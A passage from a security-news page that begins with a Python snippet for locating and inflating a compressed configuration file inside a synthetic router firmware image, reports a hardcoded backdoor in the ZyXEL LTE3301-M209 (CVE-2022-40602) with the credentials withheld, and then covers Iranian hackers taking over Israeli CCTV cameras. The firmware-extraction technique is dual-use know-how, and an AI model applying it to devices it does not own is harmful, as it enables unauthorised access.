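def inflate_at(blob: bytes, offset: int) -> bytes:
    """Inflate the zlib stream starting at offset; bytes after the stream are ignored."""
    d = zlib.decompressobj()
    out = d.decompress(blob[offset:])
    if not d.eof:
        raise ValueError(f"zlib stream at 0x{offset:x} is truncated")
    return out


def build_sample_image() -> Tuple[bytes, Dict[str, int]]:
    """Constructed image (not the LTE3301-M209 firmware): a kernel placeholder, a
    root-fs placeholder, and a config-like file whose zlib stream begins 0x10 bytes in."""
    config_plain = b"telnet_enabled=1\nweb_user=admin\n# credentials deliberately omitted\n"
    config_file = b"CFG\x00" + bytes(12) + zlib.compress(config_plain, 6)
    parts: List[bytes] = []
    offsets: Dict[str, int] = {}

    def add(kind: str, data: bytes) -> None:
        offsets[kind] = sum(len(p) for p in parts)
        parts.append(data)

    add("pad", bytes(0x40))
    add("lzma", LZMA_MAGIC + bytes(0x80))
    add("squashfs", SQUASHFS_MAGIC + bytes(0x80))
    add("config_file", config_file)
    return b"".join(parts), offsets


if __name__ == "__main__":
    image, offsets = build_sample_image()
    for off, kind in find_sections(image):
        print(f"0x{off:06x}  {kind}")
    zlib_off = offsets["config_file"] + 0x10
    print(inflate_at(image, zlib_off).decode())
```

On a real image you would unpack the SquashFS with the usual tools and then run `find_sections` on the individual file that holds the configuration; the header check is the same, and `inflate_at` is what turns the stream at 0x10 into the plaintext the write-up goes on to search.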

Once the file was unpacked, RE-Solver noticed the following sequence:


Although he did not find the Telnet credentials there, he discovered what looks like a backdoor in the web UI.

“Same as before, unpack the config.dat: it is going to contain the telnet login password,” states the expert. “Let’s put things together: on ZyXEL LTE3301 we have two ways to own the device:

  • webUI credentials –> username / WebUIFakePassword
  • telnet credentials  –> root / TelnetFakePassword

Owners of impacted devices have to upgrade them with the latest firmware release as soon as possible.

Below is the timeline for this issue:

  • 12 Sep 2022: Vulnerability reported to ZyXEL
  • 13 Sep 2022: ZyXEL asks for detail in order to replicate the vulnerability.
  • 13 Sep 2022: Details sent to ZyXEL.
  • 14 Sep 2022: ZyXEL confirms that the issues only affect the LTE3301-M209 model. They are working with the vendor to fix it. They ask to keep the information confidential until the patch has been released.
  • 17 Sep 2022: Waiting for the patch.
  • 19 Oct 2022: The issue is now tracked by CVE-2022-40602
  • 22 Nov 2022: ZyXEL’s security bulletin published. A firmware fix has been released.
  • 24 Dec 2022: Hopefully users have now updated their devices; it’s time to make my blog post public.

The expert and the Zyxel PSIRT decided not to disclose the credentials to prevent mass exploitation in the wild.


Pierluigi Paganini

(SecurityAffairs – hacking, ZyXEL LTE3301-M209)


An Iranian group hacked Israeli CCTV cameras, defense was aware but didn’t block it

An Iranian group hacked dozens of CCTV cameras in Israel in 2021 and maintained access for a long period of time.

An Iranian hacking group known as Moses Staff seized control of dozens of Israeli CCTV cameras; the authorities knew about the intrusion but did nothing to stop it, The Times of Israel reported, citing a preview of a full investigative report by the Kan public broadcaster.

“In a preview of a full investigative report set to be aired on Tuesday, the Kan public broadcaster said officials did not take action to secure the cameras, despite their knowledge of the activities of the group, known as Moses Staff.” reported The Times of Israel.

According to Kan, hackers gained access to the CCTV cameras and were able to control them for a lengthy period.

In 2021, the group published on its Telegram channel footage of the surroundings of the Rafael defense contractor’s factory in Haifa, as well as footage from cameras in the Israeli cities of Jerusalem and Tel Aviv.

Photo: a security camera of a large security organization that was hacked by Iranian hackers, Jerusalem, November 24, 2022. Photo by Olivier Fitoussi/Flash90 (source: The Times of Israel).

The group published several videos, including footage of an arms facility and of a terror attack in Jerusalem in November.

The video of the attack was previously unseen footage that came from surveillance cameras used by a major Israeli security organization. The Moses Staff group claimed it had hacked the security cameras.

“We’ve been surveillance [sic] you for many years, at every moment and on each step. This is just one part of our surveillance over your activities through access to CCTV cameras in the country. We had said that, we will strike you while you never would have imagined,” the group wrote on its Telegram channel in January speaking to the Israeli intelligence.

Security officials now told Kan that the footage uploaded by Moses Staff came from civilian cameras that were not connected to any security infrastructure.

According to Kan, the full report details the surveillance activity Moses Staff conducted by hacking the cameras to spy on senior Israeli officials, and includes information on the Iranian group.

According to The Times of Israel, in June the Iranian hacker group claimed responsibility for a cyberattack that caused rocket sirens to go off in some areas of Jerusalem and the southern city of Eilat.


Pierluigi Paganini

(SecurityAffairs – hacking, Iranian group)
